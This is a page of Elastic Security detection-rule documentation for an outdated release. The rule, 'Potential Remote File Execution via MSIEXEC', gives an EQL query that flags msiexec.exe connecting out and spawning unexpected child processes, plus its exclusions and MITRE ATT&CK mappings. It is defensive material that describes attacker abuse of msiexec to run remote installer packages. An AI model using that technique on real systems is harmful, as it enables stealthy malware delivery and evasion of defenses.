IMPORTANT: No additional bug fixes or documentation updates
will be released for this version. For the latest information, see the
current release documentation.
Potential Remote File Execution via MSIEXEC
editPotential Remote File Execution via MSIEXEC
editIdentifies the execution of the built-in Windows Installer, msiexec.exe, to install a remote package. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files.
Rule type: eql
Rule indices:
- logs-endpoint.events.*
Severity: low
Risk score: 21
Runs every: 5m
Searches indices from: now-9m (Date Math format, see also Additional look-back time
)
Maximum alerts per execution: 100
References: None
Tags:
- Domain: Endpoint
- OS: Windows
- Use Case: Threat Detection
- Tactic: Initial Access
- Tactic: Defense Evasion
- Data Source: Elastic Defend
Version: 2
Rule authors:
- Elastic
Rule license: Elastic License v2
Rule query
editsequence with maxspan=1m [process where host.os.type == "windows" and event.action == "start" and process.name : "msiexec.exe" and process.args : "/V"] by process.entity_id [network where host.os.type == "windows" and process.name : "msiexec.exe" and event.action == "connection_attempted"] by process.entity_id [process where host.os.type == "windows" and event.action == "start" and process.parent.name : "msiexec.exe" and user.id : ("S-1-5-21-*", "S-1-5-12-1-*") and not process.executable : ("?:\\Windows\\SysWOW64\\msiexec.exe", "?:\\Windows\\System32\\msiexec.exe", "?:\\Windows\\System32\\srtasks.exe", "?:\\Windows\\SysWOW64\\srtasks.exe", "?:\\Windows\\System32\\taskkill.exe", "?:\\Windows\\Installer\\MSI*.tmp", "?:\\Program Files\\*.exe", "?:\\Program Files (x86)\\*.exe", "?:\\Windows\\System32\\ie4uinit.exe", "?:\\Windows\\SysWOW64\\ie4uinit.exe", "?:\\Windows\\System32\\sc.exe", "?:\\Windows\\system32\\Wbem\\mofcomp.exe", "?:\\Windows\\twain_32\\fjscan32\\SOP\\crtdmprc.exe", "?:\\Windows\\SysWOW64\\taskkill.exe", "?:\\Windows\\SysWOW64\\schtasks.exe", "?:\\Windows\\system32\\schtasks.exe", "?:\\Windows\\System32\\sdbinst.exe") and not (process.code_signature.subject_name == "Citrix Systems, Inc." and process.code_signature.trusted == true) and not (process.name : ("regsvr32.exe", "powershell.exe", "rundll32.exe", "wscript.exe") and process.Ext.token.integrity_level_name == "high" and process.args : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*")) and not (process.executable : ("?:\\Program Files\\*.exe", "?:\\Program Files (x86)\\*.exe") and process.code_signature.trusted == true) and not (process.name : "rundll32.exe" and process.args : "printui.dll,PrintUIEntry") ] by process.parent.entity_id
Framework: MITRE ATT&CKTM
-
Tactic:
- Name: Initial Access
- ID: TA0001
- Reference URL: https://attack.mitre.org/tactics/TA0001/
-
Technique:
- Name: Phishing
- ID: T1566
- Reference URL: https://attack.mitre.org/techniques/T1566/
-
Sub-technique:
- Name: Spearphishing Link
- ID: T1566.002
- Reference URL: https://attack.mitre.org/techniques/T1566/002/
-
Tactic:
- Name: Defense Evasion
- ID: TA0005
- Reference URL: https://attack.mitre.org/tactics/TA0005/
-
Technique:
- Name: System Binary Proxy Execution
- ID: T1218
- Reference URL: https://attack.mitre.org/techniques/T1218/
-
Sub-technique:
- Name: Msiexec
- ID: T1218.007
- Reference URL: https://attack.mitre.org/techniques/T1218/007/